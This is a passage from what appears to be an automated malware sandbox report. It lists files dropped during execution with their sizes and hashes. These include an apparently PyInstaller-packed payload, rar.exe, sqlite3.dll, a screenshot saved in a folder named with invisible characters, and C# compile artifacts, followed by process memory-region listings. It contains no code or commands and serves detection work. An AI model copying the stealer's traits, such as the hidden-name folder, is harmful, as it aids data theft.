        7920078cca3dde8b1de6f36036f60925748c5164

        SHA256

        2bcfb46899672a91dbf11c2b43f1e9cc9b9a21dd04419d3fc7c6c867476e571e

        SHA512

        419b56841987206628af698363341aab3ec7f42bb3b866e5b7c28ca4fedd597152f84035d3ec99c7e86db5cd21dd21cc794ce7076123d040cb4254c6ba218b0a

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\blank.aes

        Filesize

        113KB

        MD5

        3fbffaaf963eb9f9914580e6ce0efd85

        SHA1

        653986de252c710ebc40d23d4f081f99f918609a

        SHA256

        c87dbb44bbce9fd6f6e9b8e3f90a626153b61f884390495eaee4086db1461035

        SHA512

        7ed800ce5b4138f413914c27299b25b63f6c903eb66bb57283eee0715b82cf67b33bfa9c93214822100e9ea8209b2f13ae3251e477e5194db95f5a9215f835b3

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\libcrypto-3.dll

        Filesize

        1.6MB

        MD5

        27515b5bb912701abb4dfad186b1da1f

        SHA1

        3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411

        SHA256

        fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a

        SHA512

        087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\libffi-8.dll

        Filesize

        29KB

        MD5

        08b000c3d990bc018fcb91a1e175e06e

        SHA1

        bd0ce09bb3414d11c91316113c2becfff0862d0d

        SHA256

        135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

        SHA512

        8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\libssl-3.dll

        Filesize

        223KB

        MD5

        6eda5a055b164e5e798429dcd94f5b88

        SHA1

        2c5494379d1efe6b0a101801e09f10a7cb82dbe9

        SHA256

        377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8

        SHA512

        74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\python311.dll

        Filesize

        1.6MB

        MD5

        76eb1ad615ba6600ce747bf1acde6679

        SHA1

        d3e1318077217372653be3947635b93df68156a4

        SHA256

        30be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1

        SHA512

        2b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe

        Filesize

        615KB

        MD5

        9c223575ae5b9544bc3d69ac6364f75e

        SHA1

        8a1cb5ee02c742e937febc57609ac312247ba386

        SHA256

        90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

        SHA512

        57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\rarreg.key

        Filesize

        456B

        MD5

        4531984cad7dacf24c086830068c4abe

        SHA1

        fa7c8c46677af01a83cf652ef30ba39b2aae14c3

        SHA256

        58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

        SHA512

        00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\select.pyd

        Filesize

        25KB

        MD5

        2398a631bae547d1d33e91335e6d210b

        SHA1

        f1f10f901da76323d68a4c9b57f5edfd3baf30f5

        SHA256

        487fd8034efaf55106e9d04fc5d19fcd3e6449f45bc87a4f69189cd4ebb22435

        SHA512

        6568982977b8adb6ee04b777a976a2ecc3e4db1dffbd20004003a204eb5dae5980231c76c756d59a5309c2b1456cb63ab7671705a2c2e454c667642beb018c21

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\sqlite3.dll

        Filesize

        630KB

        MD5

        cc9d1869f9305b5a695fc5e76bd57b72

        SHA1

        c6a28791035e7e10cfae0ab51e9a5a8328ea55c1

        SHA256

        31cb4332ed49ce9b31500725bc667c427a5f5a2a304595beca14902ba7b7eeee

        SHA512

        e6c96c7c7665711608a1ba6563b7b4adb71d0bf23326716e34979166de65bc2d93cb85d0cb76475d55fd042da97df978f1423c099ad5fbeeaef8c3d5e0eb7be1

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\unicodedata.pyd

        Filesize

        295KB

        MD5

        6279c26d085d1b2efd53e9c3e74d0285

        SHA1

        bd0d274fb9502406b6b9a5756760b78919fa2518

        SHA256

        411bfb954b38ec4282d10cecb5115e29bffb0b0204ffe471a4b80777144b00f6

        SHA512

        30fdeed6380641fbb4d951d290a562c76dd44b59194e86f550a4a819f46a0deb7c7a2d94867cc367c41dcab9efb95628d65fe9a039c0e14a679c149148d82ac9

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jikzotj0.hkv.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\vizgkhtr\vizgkhtr.dll

        Filesize

        4KB

        MD5

        61311a549dd04889d1e315ffdc61601e

        SHA1

        81b4deb95b7d93746aeba2e0c96935cc35534bff

        SHA256

        6df75ec9a0d76fd0ecdb89f1a31b701de2611a6d4a8da6a8ca4726745c259703

        SHA512

        04d506782cc182a3285c0046041461132b4147e659df65a58fccaeff18eb1c22f3753c34eea8a612f6cbf6a75525740cee4fb00b9fdf4feeb23a111c5b2ab0ae

      • C:\Users\Admin\AppData\Local\Temp\‏  ‌      \Display (1).png

        Filesize

        424KB

        MD5

        7b3461e8491164bdd816ea8870fd080f

        SHA1

        ee7b558dce7d5a56d8245cd56be15e60ddc35a0b

        SHA256

        06e2b22af9e909bb1de569da7546f25c08565a5a2ab2e697d55fb0c6ccbb45e8

        SHA512

        0b2d88b619ba0871a5099a004aeba0af3f11335424ef729b81a691a8ed5015dad87fddad4a1256ece6848fa4db860ed8ee49cbdd05ff98fd15f8d9b97acd5abf

      • \??\c:\Users\Admin\AppData\Local\Temp\vizgkhtr\CSCB92A0E1F939F48B381A2197FED496A13.TMP

        Filesize

        652B

        MD5

        7269aa5471e9d505b9e6073ef34fa5d5

        SHA1

        2c46f3a6246477273a43b83f7f0a26fc25bc1e9c

        SHA256

        191db485722bd1d655260cb99f15d90fb6b28691ddce97205e5654ab5b39372c

        SHA512

        e2a31775a225b66d01195d7a9a1f873c99febf76b1605a6b6bd0b80b0e1af0682b74c69753a5d3c2ef06d84c623263ab45b5e609e00f0d17a3b4b7dd8cab8954

      • \??\c:\Users\Admin\AppData\Local\Temp\vizgkhtr\vizgkhtr.0.cs

        Filesize

        1004B

        MD5

        c76055a0388b713a1eabe16130684dc3

        SHA1

        ee11e84cf41d8a43340f7102e17660072906c402

        SHA256

        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

        SHA512

        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

      • \??\c:\Users\Admin\AppData\Local\Temp\vizgkhtr\vizgkhtr.cmdline

        Filesize

        607B

        MD5

        f09233f46da051b61d3bc0d8d1568951

        SHA1

        d1f356ed49b9180719cf991a43b2c76670673d11

        SHA256

        6053a68b4ac32feeed201c8eba6798dfd29447e6dfda712d49b27fc9e29894c4

        SHA512

        899cb942b1f971ac32811f48ab6126051e37793ce35f3a89802955810fd99a751ccb2d8cd351ca936a56ba1a370842b8d4dfe6c8ee2f4383df0dc4f3ce7c218d

      • memory/1800-78-0x00007FF927600000-0x00007FF92760D000-memory.dmp

        Filesize

        52KB

      • memory/1800-136-0x00007FF9183F0000-0x00007FF918566000-memory.dmp

        Filesize

        1.5MB

      • memory/1800-73-0x00007FF92B120000-0x00007FF92B144000-memory.dmp

        Filesize

        144KB

      • memory/1800-77-0x00007FF9274A0000-0x00007FF9274B4000-memory.dmp

        Filesize

        80KB

      • memory/1800-81-0x00007FF917AF0000-0x00007FF917C0C000-memory.dmp

        Filesize

        1.1MB

      • memory/1800-80-0x00007FF92AF30000-0x00007FF92AF53000-memory.dmp

        Filesize

        140KB

      • memory/1800-171-0x00007FF917EC0000-0x00007FF9183E2000-memory.dmp

        Filesize

        5.1MB

      • memory/1800-74-0x00007FF917EC0000-0x00007FF9183E2000-memory.dmp

        Filesize

        5.1MB

      • memory/1800-69-0x00007FF927630000-0x00007FF9276FD000-memory.dmp

        Filesize

        820KB

      • memory/1800-68-0x00007FF926AA0000-0x00007FF92708E000-memory.dmp

        Filesize

        5.9MB

      • memory/1800-66-0x00007FF9278D0000-0x00007FF927903000-memory.dmp

        Filesize

        204KB

      • memory/1800-63-0x00007FF928140000-0x00007FF928159000-memory.dmp

        Filesize

        100KB

      • memory/1800-64-0x00007FF92B090000-0x00007FF92B09D000-memory.dmp

        Filesize

        52KB

      • memory/1800-60-0x00007FF9183F0000-0x00007FF918566000-memory.dmp

        Filesize

        1.5MB

      • memory/1800-58-0x00007FF92AF30000-0x00007FF92AF53000-memory.dmp

        Filesize

        140KB

      • memory/1800-174-0x00007FF917AF0000-0x00007FF917C0C000-memory.dmp

        Filesize

        1.1MB

      • memory/1800-56-0x00007FF92C650000-0x00007FF92C669000-memory.dmp

        Filesize

        100KB

      • memory/1800-54-0x00007FF92B0F0000-0x00007FF92B11D000-memory.dmp

        Filesize

        180KB

      • memory/1800-47-0x00007FF92B120000-0x00007FF92B144000-memory.dmp

        Filesize

        144KB

      • memory/1800-72-0x000001A49F180000-0x000001A49F6A2000-memory.dmp

        Filesize

        5.1MB

      • memory/1800-48-0x00007FF92FB80000-0x00007FF92FB8F000-memory.dmp

        Filesize

        60KB

      • memory/1800-159-0x00007FF928140000-0x00007FF928159000-memory.dmp

        Filesize

        100KB

      • memory/1800-160-0x00007FF926AA0000-0x00007FF92708E000-memory.dmp

        Filesize

        5.9MB

      • memory/1800-186-0x00007FF9274A0000-0x00007FF9274B4000-memory.dmp

        Filesize

        80KB

      • memory/1800-185-0x00007FF927600000-0x00007FF92760D000-memory.dmp

        Filesize

        52KB

      • memory/1800-184-0x00007FF927630000-0x00007FF9276FD000-memory.dmp

        Filesize

        820KB

      • memory/1800-183-0x00007FF9278D0000-0x00007FF927903000-memory.dmp

        Filesize

        204KB

      • memory/1800-182-0x00007FF928140000-0x00007FF928159000-memory.dmp

        Filesize

        100KB

      • memory/1800-181-0x00007FF9183F0000-0x00007FF918566000-memory.dmp

        Filesize

        1.5MB

      • memory/1800-180-0x00007FF92AF30000-0x00007FF92AF53000-memory.dmp

        Filesize

        140KB

      • memory/1800-179-0x00007FF92C650000-0x00007FF92C669000-memory.dmp

        Filesize

        100KB

      • memory/1800-178-0x00007FF92B0F0000-0x00007FF92B11D000-memory.dmp

        Filesize

        180KB

      • memory/1800-177-0x00007FF92FB80000-0x00007FF92FB8F000-memory.dmp

        Filesize

        60KB

      • memory/1800-176-0x00007FF92B120000-0x00007FF92B144000-memory.dmp

        Filesize

        144KB

      • memory/1800-175-0x00007FF92B090000-0x00007FF92B09D000-memory.dmp

        Filesize

        52KB

      • memory/1800-25-0x00007FF926AA0000-0x00007FF92708E000-memory.dmp

        Filesize

        5.9MB

      • memory/2044-82-0x00000279A0310000-0x00000279A0332000-memory.dmp

        Filesize

        136KB

      • memory/2572-127-0x0000022EC45E0000-0x0000022EC45E8000-memory.dmp

        Filesize

        32KB